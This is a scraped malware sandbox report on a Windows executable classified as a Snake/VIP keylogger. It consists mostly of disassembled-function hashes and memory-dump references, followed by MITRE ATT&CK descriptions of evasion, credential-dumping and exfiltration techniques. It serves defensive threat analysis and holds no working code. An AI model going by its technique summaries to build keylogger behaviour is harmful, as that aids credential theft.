Instruction Fuzzy Hash: B9410270D052588BDB58DFAAD8847AEBBF2BF89300F60C06AD418BB254EB315946CF50

Function 0642C1EA Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c740926e6758d936c0802b86f9011bf5bad6db8b945337e075280b700420a24
Instruction ID: b54e32dff52369f9bcf2c20ee75ceaf50929fbe84b079c17ec0b4e8a2f838ac9
Opcode Fuzzy Hash: 3c740926e6758d936c0802b86f9011bf5bad6db8b945337e075280b700420a24
Instruction Fuzzy Hash: 4041E770D002198BDB94DFAAD8846EEBBF2BF89300F60D16AD418BB254DB354946CF50

Function 06450E91 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22814897eae35b6490158486cd69078913e58c8bff248052a593aa0f35b63ba4
Instruction ID: c513bb068c745e77e5436ac79f87ac70fdf9172df0730b0bb70c9acb7e172382
Opcode Fuzzy Hash: 22814897eae35b6490158486cd69078913e58c8bff248052a593aa0f35b63ba4
Instruction Fuzzy Hash: 4F41D275D012189BEB58DFAAD8547EEBBF2BF88300F20D02AD419BB255EB354942CF54

Function 06428D50 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec991e59b6c462a3b272fd9bc174fb1295038ac0be15e8f24352ba5b90a9165
Instruction ID: 5a517260bb744a43f4710840836b14d4d81ba58b11e2ed4706226cb153333f85
Opcode Fuzzy Hash: cec991e59b6c462a3b272fd9bc174fb1295038ac0be15e8f24352ba5b90a9165
Instruction Fuzzy Hash: C641E270D002588FEB58DFAAD8546EEBBF2AF89300F64C06AC458AB254EB315946CF50

Function 06424E0A Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd05942424791e5df43aac9d0e521c368b58ea2642ad36c6e73f167312f04e47
Instruction ID: af8c4c62dd091b63b6d4564e086a897b39fdc489ad16ae043b96683601e4af5c
Opcode Fuzzy Hash: cd05942424791e5df43aac9d0e521c368b58ea2642ad36c6e73f167312f04e47
Instruction Fuzzy Hash: FC41D370D012588BEB58DFEAC8546DEFBF2AF89300F64C02AC459AB258EB345946CF54

Function 06429218 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d859058bd28fb3f2a899905d9ebd1c5cc96c75ef2f29ce56c2f7236abc0f37da
Instruction ID: fbfa8cb33be5e63093892c4e02f83d19de16b726646e17a49d8b65d8328864ce
Opcode Fuzzy Hash: d859058bd28fb3f2a899905d9ebd1c5cc96c75ef2f29ce56c2f7236abc0f37da
Instruction Fuzzy Hash: 6B4115B0D002188BDB58DFAAD8546EEBBF2BF89300F60D46AC418BB354EB354942CF50

Function 06424970 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb148762543bf7aed706cf74382b04d8906be832aec936cf1f42206dc26228e
Instruction ID: a14949ca9c633c168196975cec84af4ec79dff799d448bc721addedc0410f77f
Opcode Fuzzy Hash: 9eb148762543bf7aed706cf74382b04d8906be832aec936cf1f42206dc26228e
Instruction Fuzzy Hash: 7241D470D002588BEB58DFAAD9446DEFBF2EF89300F64D02AC419AB258DB344946CF54

Function 0645DA70 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25ace20815c73dddcb9c63ab569286e022f2e4c14cd73b0f5d771227943e5df
Instruction ID: d6f720ad7493acc0de8ea3b1e892d4fd43fad440e72e40b05a25963a984d53c4
Opcode Fuzzy Hash: f25ace20815c73dddcb9c63ab569286e022f2e4c14cd73b0f5d771227943e5df
Instruction Fuzzy Hash: 3B410674D012489FDB48DFAAD8506EEBBF2AFC9300F10D02AD818BB255DB344906CF54

Function 0642E360 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd700aa8fd7a3adc0e67b8a7ecffd012ac7dff8e1caea200f14112d5a24c2f5
Instruction ID: 458f13b14c82813f155246bb1ec72b7ed71ab8bdb02e03793236537eb2764d54
Opcode Fuzzy Hash: 7bd700aa8fd7a3adc0e67b8a7ecffd012ac7dff8e1caea200f14112d5a24c2f5
Instruction Fuzzy Hash: 0B410370D002188BEB58DFAAD8543EEBBF2BF89300F64D06AC458BB254EB314942CF54

Function 0642ECF2 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea0eba3d79dd37bd7089c4cf84f7e3fcc759bf9d33662ff6e2fd2bd35ce2799
Instruction ID: 42b301da2f3814f0ee1611081d925c5f400e2368262e0d5915fdf3db94a7c6d9
Opcode Fuzzy Hash: dea0eba3d79dd37bd7089c4cf84f7e3fcc759bf9d33662ff6e2fd2bd35ce2799
Instruction Fuzzy Hash: FC410870D002198BEB58DFAAD9547EEBBF2BF89300F60D06AC418BB254DB354946CF50

Function 0645F379 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172df35c3c96850ccc2ae4be3ebbd63d5f9dd7a105cd5d118925ee96f0561bfc
Instruction ID: 2d18c0dcc6b0cdb9702a7bc0cff272ff43754af8e0e23c4f8ed7b88f8829c22a
Opcode Fuzzy Hash: 172df35c3c96850ccc2ae4be3ebbd63d5f9dd7a105cd5d118925ee96f0561bfc
Instruction Fuzzy Hash: 0E41F674D012488FDB88DFAAD8406EEBBF2AF89300F10D12AD818BB359DB354906CF51

Function 0642D508 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef580789d93f61cf6749d26dcf7851776f5f8a27ed85779ce6a00ed38a1dd3cf
Instruction ID: 448d59cfa7b225b517a0af2b2670f87d024433232b0a6d974c8c2115971db183
Opcode Fuzzy Hash: ef580789d93f61cf6749d26dcf7851776f5f8a27ed85779ce6a00ed38a1dd3cf
Instruction Fuzzy Hash: 5A41E370D002198BDB98DFAAD8543EEBBF2BF89304F64D06AC458BB258DB344946CF44

Function 0642AEC8 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d869b7edb2d2b8dbf06a650bd280a5ea5ee4717e858c7b97055a1fb74cf2d7cc
Instruction ID: e7535fd84a77de7be96da7748258a4f234468964dbc51eb1692249b9755eeab9
Opcode Fuzzy Hash: d869b7edb2d2b8dbf06a650bd280a5ea5ee4717e858c7b97055a1fb74cf2d7cc
Instruction Fuzzy Hash: C141E371D01219CBDB58DFAAD8446AEBBF2FF89300F64D06AC428AB254EB344946CF50

Function 0642D9D0 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2309cc8c59b52f35458d2b96f02ffc4bd2196254ea860fe2e9898ffb7c8534
Instruction ID: 7cef66cf0bdcc4630a121f45d29b44b39549a57e97427378a82cb955575ddedd
Opcode Fuzzy Hash: dd2309cc8c59b52f35458d2b96f02ffc4bd2196254ea860fe2e9898ffb7c8534
Instruction Fuzzy Hash: 4E41F070D002188BEB58DFAAD8547EEBBF2BF89300F64D06AC458BB254EB314946CF40

Function 064296E0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e19d71e30324e78a248a0060109997cd6cb3aeb32c021ca71f420d472ffe92
Instruction ID: 353b8269ff5b770ebf3f40abb3ebdc1872d980ba2b3f9ec939513f4b10cec5ad
Opcode Fuzzy Hash: e5e19d71e30324e78a248a0060109997cd6cb3aeb32c021ca71f420d472ffe92
Instruction Fuzzy Hash: 9541E471E012198BEB58DFAAD8447EDBBF2BF89300F64D16AC458BB254EB345942CF44

Function 0645ED30 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e01bba45f5df9a0b395fa99e7eb82c13ad5eb0743c38cf477f7768618734b78f
Instruction ID: ea59736c5a20a89697278171b9b27ae1b74c3ee9052d9b3e83b0ce39f72c81a7
Opcode Fuzzy Hash: e01bba45f5df9a0b395fa99e7eb82c13ad5eb0743c38cf477f7768618734b78f
Instruction Fuzzy Hash: 3731E575D012089BDB98DFAAD8406EEBBF2AF89300F14D02AD819BB259DB355946CF50

Function 0642756A Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00678b4b637429b4bdd61552b0375f8fda957fbed5a8c7654fb28c9b96a3fdd3
Instruction ID: bf21c728ad41e149a4208125db090dcadaa6fbea33f8e12e01678ae1907f874e
Opcode Fuzzy Hash: 00678b4b637429b4bdd61552b0375f8fda957fbed5a8c7654fb28c9b96a3fdd3
Instruction Fuzzy Hash: DF41D4B4D00219CBEB58DFAAD8547AEBBF2BF89300F64D06AD458BB254DB344942CF40

Function 06451358 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2ddfc4982ef4f9d1cb249c30376174582830f3054bb701395bda5385b55fde
Instruction ID: f5e9225cbe2de803d7de880c331802c2698f478cf142e1ae00a3eab6a582ef45
Opcode Fuzzy Hash: 1b2ddfc4982ef4f9d1cb249c30376174582830f3054bb701395bda5385b55fde
Instruction Fuzzy Hash: 5C410274D012188BEB58DFAAD8447AEFBF2BF89300F14D06AC419BB255EB344946CF40

Function 06458F70 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8851263e032a631b332a2fb6c799c2035b64bb51529208e8c5709b554e85559a
Instruction ID: 21ff5573b29a10565be5851256d736c344434c1fb0cec091f0207d80d5377571
Opcode Fuzzy Hash: 8851263e032a631b332a2fb6c799c2035b64bb51529208e8c5709b554e85559a
Instruction Fuzzy Hash: 5B31D275E01258CBDB48DFAAD8406EEBBF2AF89300F24D02AD819BB255DB354902CF50

Function 0642CB7E Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed09ac5ec6be98702111db08277bf4e902cb7e9aa6912a1c65cfa1a70fd1d1f
Instruction ID: 62cabb4047119933972a4cdda106dbdf021437efe57f8ca828149311b881942a
Opcode Fuzzy Hash: aed09ac5ec6be98702111db08277bf4e902cb7e9aa6912a1c65cfa1a70fd1d1f
Instruction Fuzzy Hash: 8141E570D002188BDB98DFAAD8947EEBBF2BF89304F64D06AC459BB254DB354942CF44

Function 064509C0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008c5c0222129e5ce47a85e9cab8808ccdbb53055dbc69b8d96772c0b9a8db5a
Instruction ID: 00b069581f07239d8c60f2cc2cb4dbfb216c14924cda8e32c9b48e1381512a92
Opcode Fuzzy Hash: 008c5c0222129e5ce47a85e9cab8808ccdbb53055dbc69b8d96772c0b9a8db5a
Instruction Fuzzy Hash: AD41F675D00218CBDB98DFAAD9546EEBBF2BF89300F14D02AC419BB255EB345942CF40

Function 0642A070 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee480fc6fd9dec9acb4610675c1f09310282cd8a79a97f95388775389e8b3d8a
Instruction ID: 6faac462228f588f8d8b4db5b0ceadb98adc49678a87cd02c3fef0bface20582
Opcode Fuzzy Hash: ee480fc6fd9dec9acb4610675c1f09310282cd8a79a97f95388775389e8b3d8a
Instruction Fuzzy Hash: 1041F574D002188BEB58DFAAD9447EEBBF2BF88300F60D02AC418BB254DB345942CF40

Function 0642D04B Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 267a5f0245fed2a0f1b3c2e46f99d7c45167320cab6ea0df20772e57d9615cf9
Instruction ID: e3e0a585571dc5d03d0c3d5248ece6aec7cbcf94665c6913bca00be57d75d6cb
Opcode Fuzzy Hash: 267a5f0245fed2a0f1b3c2e46f99d7c45167320cab6ea0df20772e57d9615cf9
Instruction Fuzzy Hash: B441D674D012198BDB98DFAAD9547EEBBF2BF89300F60D06AC419BB254DB345942CF50

Function 0642AA0A Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ecc332d282f8eb6e7a1eacf2734da5722e6ffa64ccfd3cbd48ce449bd4b48d3
Instruction ID: 4b6deb26fa21d33443183c702148c7326a978ccd699a8f2b6fcb48a17f813b47
Opcode Fuzzy Hash: 3ecc332d282f8eb6e7a1eacf2734da5722e6ffa64ccfd3cbd48ce449bd4b48d3
Instruction Fuzzy Hash: 8E41C271D002198BEB58DFAAD9547AEBBF2BF89300F64D06AC418BB254EB344946CF40

Function 064535A8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087097484126bd97f737be66487d229b22c5b6ceb17256349cf8b9f5c16a3a50
Instruction ID: a92f28033b448cc20c01476ce5969a3958a271a248d07ee6de04aed19bf28dcc
Opcode Fuzzy Hash: 087097484126bd97f737be66487d229b22c5b6ceb17256349cf8b9f5c16a3a50
Instruction Fuzzy Hash: 4E31F775D01208CBDB59DFAAD9516EEBBF2AF89300F24D02AC819B7354EB355942CF50

Function 06421BCF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e95d7cf4b9cf783db314d233fb3b6076a78e51a00a36b0ccb639132bd32a52
Instruction ID: c10aa96cb905c275e32790e84b8d372703d878b0070484cbcff2dcf86159d8ab
Opcode Fuzzy Hash: c5e95d7cf4b9cf783db314d233fb3b6076a78e51a00a36b0ccb639132bd32a52
Instruction Fuzzy Hash: 5E41C475D01218CBEB58DFAAD9446AEBBF2AF89300F60D02AC519BB258DB344945CF40

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YDg44STseR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

